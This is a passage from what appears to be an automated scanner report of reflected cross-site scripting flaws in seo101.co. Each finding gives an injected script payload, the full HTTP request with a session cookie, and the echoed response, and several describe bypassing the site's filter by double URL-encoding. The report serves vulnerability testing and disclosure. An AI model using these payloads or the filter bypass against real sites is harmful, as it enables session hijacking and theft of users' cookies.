The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a292"><script>alert(1)</script>8961f3fc872 was submitted in the REST URL parameter 4. This input was echoed as 9a292\"><script>alert(1)</script>8961f3fc872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png9a292"><script>alert(1)</script>8961f3fc872 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:03:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26919


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/logo.png9a292\"><script>alert(1)</script>8961f3fc872 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.117. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15079%253balert%25281%2529%252f%252ff90119d5a01 was submitted in the REST URL parameter 4. This input was echoed as 15079;alert(1)//f90119d5a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png15079%253balert%25281%2529%252f%252ff90119d5a01 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:05:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/logo.png15079;alert(1)//f90119d5a01 SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.118. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de68d"><script>alert(1)</script>832b0275f9 was submitted in the REST URL parameter 1. This input was echoed as de68d\"><script>alert(1)</script>832b0275f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cde68d"><script>alert(1)</script>832b0275f9/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<de68d\"
...[SNIP]...
<de68d\"><script>alert(1)</script>832b0275f9/title>
...[SNIP]...

4.119. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9da1</script><script>alert(1)</script>c5e7dbceb46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cb9da1</script><script>alert(1)</script>c5e7dbceb46/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:39:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<b9da1</
...[SNIP]...
<b9da1</script><script>alert(1)</script>c5e7dbceb46/title>
...[SNIP]...

4.120. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 16416><script>alert(1)</script>e9dfc5f28c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C16416><script>alert(1)</script>e9dfc5f28c3/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<16416><script>alert(1)</script>e9dfc5f28c3/title>
...[SNIP]...

4.121. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 8b775><script>alert(1)</script>9a25589bf7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/8b775><script>alert(1)</script>9a25589bf7e/img/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:48:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</8b775><script>alert(1)</script>9a25589bf7e/img/pr/1/pr5.gif SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.122. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c6d0c%253balert%25281%2529%252f%252f1105b1b95e7 was submitted in the REST URL parameter 2. This input was echoed as c6d0c;alert(1)//1105b1b95e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cc6d0c%253balert%25281%2529%252f%252f1105b1b95e7/img/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<c6d0c;alert(1)//1105b1b95e7/img/pr/1/pr5.gif SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.123. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecddb"><script>alert(1)</script>577e624468a was submitted in the REST URL parameter 2. This input was echoed as ecddb\"><script>alert(1)</script>577e624468a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cecddb"><script>alert(1)</script>577e624468a/img/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<ecddb\"><script>alert(1)</script>577e624468a/img/pr/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.124. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74406%253balert%25281%2529%252f%252f7d9fcaa0afe was submitted in the REST URL parameter 3. This input was echoed as 74406;alert(1)//7d9fcaa0afe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img74406%253balert%25281%2529%252f%252f7d9fcaa0afe/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img74406;alert(1)//7d9fcaa0afe/pr/1/pr5.gif SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.125. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180d3"><script>alert(1)</script>c597ac93db1 was submitted in the REST URL parameter 3. This input was echoed as 180d3\"><script>alert(1)</script>c597ac93db1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img180d3"><script>alert(1)</script>c597ac93db1/pr/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img180d3\"><script>alert(1)</script>c597ac93db1/pr/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.126. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9df0e%253balert%25281%2529%252f%252f122f42146bc was submitted in the REST URL parameter 4. This input was echoed as 9df0e;alert(1)//122f42146bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr9df0e%253balert%25281%2529%252f%252f122f42146bc/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:05:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/pr9df0e;alert(1)//122f42146bc/1/pr5.gif SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.127. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d84"><script>alert(1)</script>72775ac808d was submitted in the REST URL parameter 4. This input was echoed as 64d84\"><script>alert(1)</script>72775ac808d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr64d84"><script>alert(1)</script>72775ac808d/1/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/pr64d84\"><script>alert(1)</script>72775ac808d/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.128. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0ec9%253balert%25281%2529%252f%252f754bd66a136 was submitted in the REST URL parameter 5. This input was echoed as d0ec9;alert(1)//754bd66a136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1d0ec9%253balert%25281%2529%252f%252f754bd66a136/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:07:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26874


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/pr/1d0ec9;alert(1)//754bd66a136/pr5.gif SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.129. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db7b"><script>alert(1)</script>3c5c586d294 was submitted in the REST URL parameter 5. This input was echoed as 1db7b\"><script>alert(1)</script>3c5c586d294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/11db7b"><script>alert(1)</script>3c5c586d294/pr5.gif HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
